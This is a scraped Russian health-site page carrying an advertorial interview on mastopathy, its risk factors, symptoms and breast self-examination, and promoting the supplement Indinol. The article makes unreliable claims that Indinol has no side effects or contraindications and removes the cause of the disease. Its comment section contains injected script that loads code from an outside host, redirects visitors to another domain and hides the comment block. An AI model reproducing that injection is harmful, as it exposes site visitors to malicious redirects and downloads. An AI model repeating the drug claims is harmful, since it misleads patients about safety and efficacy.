Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как сохранить грудь здоро...  >>  Как сохранить грудь здоровой?
 
Обратная связь
 

Как сохранить грудь здоровой?

Размер шрифта
15 октября 2011 00:00
  • google_analytics: false
  • Нравится

Женская грудь – один из самых главных секретов женской привлекательности, сексуальности, красоты. Но, к сожалению, лишь немногие женщины задумываются о здоровье своей груди. И в последнее время маммологи все чаще ставят неутешительный диагноз: мастопатия.

Мастопатия

Итак, фиброзно-кистозная болезнь, или мастопатия, представляет собой доброкачественные изменения тканей молочной железы. Долгое время считалось, что мастопатия грозит только взрослым женщинам – от 35 до 40 лет. Однако болезнь стремительно «молодеет» и, к сожалению, касается сегодня любой женщины. На наиболее важные вопросы о мастопатии отвечает специалист, маммолог, врач высшей категории Елена Григорьевна Штолль.

В чем причина омоложения мастопатии?

За последнее столетие существенно изменился акушерский портрет женщины. Репродуктивный возраст представительниц слабого пола вырос практически в два раза: с 20 до 40 лет. Период воздействия гормонов на женский организм увеличился из-за более раннего начала менструации (12 лет) и более позднего наступления климакса (около 50 лет). Нужно понимать, что в женском организме все взаимосвязано, и одно изменение повлечет за собой другое. И поэтому свою лепту вносят и различные гинекологические заболевания, которые также способны провоцировать развитие мастопатии.

Среди общих факторов риска: стрессы и нервное напряжение, нарушение гормонального фона, алкоголь и курение, неправильное питание, аборт, первая беременность после 30 лет, отсутствие регулярной половой жизни, рождение единственного ребенка, короткий период кормления грудью (меньше 5 месяцев) или полный отказ от кормления, и многое другое. В каждом конкретном случае причины могут быть самыми разными.

Какие существуют формы мастопатии и в каком возрасте они проявляются?

МастопатияСлово «мастопатия» состоит из двух корней греческого происхождения: «mastos» означает грудь, «pathos» – болезнь, страдание. Мастопатия имеет две формы: узловую и диффузную. Эти формы обуславливаются строением молочной железы, которая напоминает гроздь винограда с большим количеством жировой и железистой ткани.

Диффузная форма подразумевает разрастание элементов молочной железы и их изменение. Эта форма характерна для молодых женщин – до 35 лет. А вот узловую форму мастопатии чаще можно встретить у пациенток возрастом от 35 до 50 лет. Узловая форма характеризуется ограниченными уплотнениями.

Бывают случаи смешения двух форм, и тогда симптомы более легкой, диффузной, формы как бы накладываются на сложную, узловую, форму фиброзно-кистозной болезни. Диагностируется это заболевание более чем у 50% пациенток, то есть у 6 женщин из 10.

Как распознать мастопатию? Может ли женщина самостоятельно поставить себе диагноз?

Как правило, мастопатия начинается бессимптомно – и в этом одна из сложностей этого заболевания. На первых порах женщину ничего не беспокоит, и, понятно, она старается лишний раз не обращаться к доктору. В большинстве случаев пациентки обращаются к врачу тогда, когда болезнь уже запущена и требует более длительного и сложного лечения. Поэтому даже совсем молоденькие девушки должны быть внимательны к незнакомым ощущениям в области молочных желез. Обычно тяжесть в груди, ноющая боль, особенно перед менструацией, является признаком мастопатии. Иногда можно отметить и увеличение лимфатических узлов в подмышках. Кроме того, при мастопатии грудь может отекать и изменять свою форму. В некоторых случаях, если надавить на сосок, то можно заметить выделения. Редко обильная жидкость из сосков может выделяться и без какого-либо надавливания.

Как проводить обследование груди?

В 90% случаев женщина способна самостоятельно диагностировать мастопатию. Лучше всего проводить самообследование ежемесячно на 6-12 день менструального цикла – именно в это время молочные железы наиболее размягчены, и их легче пальпировать.

  1. Итак, для начала следует перед зеркалом осмотреть форму груди, а также внешний вид кожи сосков – руки при этом должны быть опущены.

  2. Поднимите руки за голову и осмотрите грудь. Стоит обратить особое внимание на изменение размеров или формы одной из груди, а также на цвет кожи.

  3. Поднимите правую руку. Круговыми медленными движениями прощупайте правую грудь, обращая особое внимание на возможные утолщения и выпуклости. То же самое повторите и с левой грудью.

  4. Сдавите сосок у основания указательным и большим пальцами и посмотрите, есть ли какие-нибудь выделения.

  5. Обследуйте грудь в положении лежа. Нужно круговыми движениями с легким надавливанием прощупать грудь, начиная с краев и заканчивая соском.

  6. Круговыми движениями прощупайте правую и левую подмышечные впадины.

При малейшем подозрении на мастопатию не мешкайте – нужно срочно посетить маммолога.

Мастопатия

Как часто следует посещать маммолога? Чем опасна мастопатия?

Мастопатия представляет собой доброкачественные изменения молочных желез. Однако на фоне мастопатии риск развития рака увеличивается в 3-5 раз. При этом для женщин 20-44 лет рак молочной железы является одной из главных причин инвалидности и смерти. Чем раньше вы начнете лечить мастопатию, тем меньше шансов останется у злокачественной опухоли. Опытный маммолог лишь осмотром молочных желез не ограничится – маммография и УЗИ позволят получить более четкую, полную картину состояния женщины. УЗИ используется при исследовании более молодых женщин и не имеет противопоказаний при беременности. А вот маммографию лучше ежегодно проходить женщинам 35-40 лет, либо в случае явных проявлений заболевания.

Может ли женщина самостоятельно вылечить мастопатию? Какое лечение наиболее эффективно?

В первую очередь, стоит отметить, что лечить мастопатию может только врач после тщательного обследования и постановки диагноза. На сегодняшний день существует несколько методов лечения. К примеру, некоторые типы опухолевых узлов необходимо удалять. Самолечение заболевания снимает симптомы мастопатии и нормализует гормональный фон. На выработку гормонов влияет и образ жизни, и наличие вредных привычек, и привычки в питании. Ограничивайте себя в алкоголе и курении, следите за своим рационом – включайте в диету фрукты, травы, овощи, сократите количество жиров. В лечение мастопатии большую роль играют гормональные препараты, которые нужно подбирать индивидуально для каждой пациентки. Правда, существует риск, что после прекращения лечения и отмены гормонов мастопатия может вновь вернуться. Кроме того, при приеме гормональных препаратов есть множество ограничений – варикозное расширение вен, заболевание печени, сахарный диабет и так далее. Поэтому в последнее время при лечении мастопатии врачи предпочитают использовать негормональные препараты растительного происхождения.

Насколько эффективные негормональные препараты? В чем их отличие от гормональных?

Негормональные препараты растительного происхождения – прекрасный вариант для тех, кто в силу каких-то противопоказаний не может применять гормональные препараты. Отличным решением в этом случае может стать новое негормональное средство Индинол, разработанное ведущими учеными ММА им. И.М. Сеченова. Индинол включает в свой состав активную молекулу капусты брокколи – индол-3-карбинол. Данное вещество комплексно воздействует на организм – нормализует гормональный фон, воздействуя на больные клетки и не затрагивая при этом здоровые. Отдельно нужно отметить, что после приема Индинола рецидивов мастопатии, как правило, не наблюдается. Кроме того, за счет уникальной технологии производства Индинол обладает высоким профилем безопасности, так как содержит высокоочищенные активные молекулы, в которых нет природных примесей. Применяться препарат может в любом возрасте без каких-либо ограничений, как с лечебной, так и с профилактической целью и не имеет противопоказаний.

Как долго рекомендуется принимать негормональные препараты?

Специалисты рекомендуют принимать препарат Индинол дважды в день по 2 капсулы в течение 6 месяцев. Индинол совместим с другими гормональными и хирургическими методами лечения. Кроме того, его можно принимать после удаления новообразований в молочной железе. Эффективен препарат и в терапии различных форм мастопатии. Он избавляет от неприятных ощущений, болей. Индинол – уникальный препарат, который устраняет не симптомы, а причину заболевания. Многочисленные клинические исследования показали, чтобы после прохождения шестимесячного курса приема препарата наблюдается стойкий положительный эффект, который сохраняется больше года. Эффект от приема Индинола развивается постепенно, достигая наибольшей выраженности через 6 месяцев после начала приема препарата – это связано с происходящими глубинными механизмами воздействия на клетки молочных желез. Высокая эффективность препарата в сочетании с отсутствием каких-либо побочных эффектов позволяет специалистам рекомендовать Индинол как одно из средств первого ряда препаратов при лечении и профилактики мастопатии.

На правах рекламы

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
У вас обвиснет грудь! Из-за этих привычек!   Как обследовать свою грудь?   Все о раке груди   Носите лифчик на здоровье! Теперь не страшно!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Мифы о лифчике!
Как изменить будущее и не заболеть раком груди?
Тесты для вашей любимой груди

Тесты

1
Что вы знаете о груди?
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.